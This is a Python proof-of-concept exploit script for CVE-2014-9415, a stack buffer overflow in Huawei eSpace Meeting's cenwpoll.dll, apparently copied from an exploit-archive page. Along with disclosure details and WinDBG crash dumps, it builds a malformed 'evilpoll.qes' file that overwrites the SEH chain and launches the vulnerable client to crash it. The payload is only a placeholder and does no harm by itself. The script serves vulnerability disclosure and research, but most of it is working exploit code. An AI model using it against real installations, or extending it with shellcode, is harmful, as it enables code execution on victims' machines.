扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 |
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite # # # Vendor: Huawei Technologies Co., Ltd. # Product web page: https://www.huawei.com # Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) # Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290 # Affected module: cenwpoll.dll 1.0.8.8 # Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe # # Product description: # -------------------- # 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of # products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides # users with easy and secure access to their service platform from any device, in any place, at any time. # 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using # the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. # # Vulnerability description: # -------------------------- # eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails # to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when # handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of # the affected application. Failed exploit attempts will likely result in denial-of-service conditions. # # Tested on: # ---------- # OS Name: Microsoft Windows 7 Professional # OS Version: 6.1.7601 Service Pack 1 Build 7601 # RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz # # Vulnerability discovered by: # ---------------------------- # Gjoko 'LiquidWorm' Krstic # Senior STTE # SCD-ERC # Munich, Germany # 26th of August (Tuesday), 2014 # # PSIRT details: # -------------- # Security advisory No.: Huawei-SA-20141217- espace # Initial release date: Dec 17, 2014 # Vulnerability ID: HWPSIRT-2014-1151 # CVE ID: CVE-2014-9415 # Patched version: eSpace Meeting V100R001C03 # Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589 # # # ------------------------------------ WinDBG output ------------------------------------ # # m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045 # eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 # *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll # *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll - # cenwpoll!DllUnregisterServer+0xa59e: # 05790f3e 8178082c010000cmp dword ptr [eax+8],12Ch ds:0023:00000008=???????? # 0:008> !exchain # 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # mcstub+10041 (00410041) # Invalid exception stack at 00410041 # Instruction Address: 0x0000000005790f3e # # Description: Exception Handler Chain Corrupted # Short Description: ExceptionHandlerCorrupted # Exploitability Classification: EXPLOITABLE # Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b) # # Corruption of the exception handler chain is considered exploitable # # 0:008> d ebp # 02fecd0041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd1041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd2041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd3041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd4041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd5041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd6041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 02fecd7041 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. # 0:008> u ebp # 02fecd00 41inc ecx # 02fecd01 004100add byte ptr [ecx],al # 02fecd04 41inc ecx # 02fecd05 004100add byte ptr [ecx],al # 02fecd08 41inc ecx # 02fecd09 004100add byte ptr [ecx],al # 02fecd0c 41inc ecx # 02fecd0d 004100add byte ptr [ecx],al # # ------------------------------------ /WinDBG output ------------------------------------ # # import sys, os, time os.system('title jterm') os.system('color f5') os.system('cls') piton = os.path.basename(sys.argv[0]) def usage(): print ''' +---------------------------------------------+ |eSpace Meeting Stack Buffer Overflow Vuln| | | | Vuln ID: HWPSIRT-2014-1151| |CVE ID: CVE-2014-9415| +---------------------------------------------+ ''' if len(sys.argv) < 2: print 'Usage: \n\n\t'+piton+' <OPTION>' print '\nOPTION:\n' print '\t0 - Create the evil PoC file.' print '\t1 - Create the evil file, start the vulnerable application and crash it.' print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n' quit() usage() crash = sys.argv[1] dir = os.getcwd(); file = "evilpoll.qes" header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x..... time.sleep(1) # Overwrite FS:[0] chain (\x43 = EIP) buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode) buffer += '\x00\x01\x00\x00\x00\x00\x00\x90' buffer += '\x85\xA9\xD7\x00\x01\x04\x00' buffer += 'TEST'+'\x01\x02\x05\x00' buffer += 'ANSW1'+'\x05\x00' buffer += 'ANSW2' poc = header + buffer bytes = len(poc) print '[+] Creating evil PoC file...' time.sleep(1) print '[+] Buffering:\n' time.sleep(1) index = 0 while index < len(poc): char = poc[index] #print char, sys.stdout.write(char) time.sleep(10.0 / 1000.0) index = index + 1 try: writeFile = open (file, 'w') writeFile.write( poc ) writeFile.close() time.sleep(1) print '\n\n[+] File \"'+file+'\" successfully created!' time.sleep(1) print '[+] Location: "'+dir+'"' print '[+] Wrote '+str(bytes)+' bytes.' except: print '[-] Error while creating file!\n' if crash == '0': print '\n\n[+] Done!\n' elif crash == '1': print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n' os.system('pause') os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"') elif crash == '2': print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n' os.system('pause') os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"') print '\n[+] You should see something like this in WinDBG:' print ''' 0:000> d 0012e37c 0012e37c42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00B.B.C.C.D.D.D.D. 0012e38c44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0012e39c44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0012e3ac44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0012e3bc44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0012e3cc44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00D.D.D.D.D.D.N.e. 0012e3dc77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00w. .P.o.l.l..... 0012e3ecc2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00....V4x.p....... 0:000> !exchain 0012e37c: 00430043 Invalid exception stack at 00420042 ''' else: print '[+] Have a nice day! ^^\n' quit() print '\n[+] Have a nice day! ^^\n' #os.system('color 07') |
体验盒子
